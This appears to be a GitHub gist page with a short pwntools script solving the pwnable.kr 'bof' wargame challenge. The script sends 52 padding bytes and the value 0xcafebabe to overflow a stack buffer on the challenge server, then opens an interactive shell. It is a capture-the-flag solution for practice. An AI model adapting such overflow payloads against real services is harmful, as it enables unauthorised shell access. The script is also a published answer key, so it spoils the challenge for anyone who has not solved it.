Skip to content

Instantly share code, notes, and snippets.

@parksjin01
Last active March 16, 2017 20:55
Show Gist options
  • Save parksjin01/094b821f838febcd3cd9f715f140f669 to your computer and use it in GitHub Desktop.
Save parksjin01/094b821f838febcd3cd9f715f140f669 to your computer and use it in GitHub Desktop.
pwnable.kr bof writeup
from pwn import *
sh = remote('pwnable.kr', 9000)
sh.sendline('a'*52+'\xbe\xba\xfe\xca')
sh.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment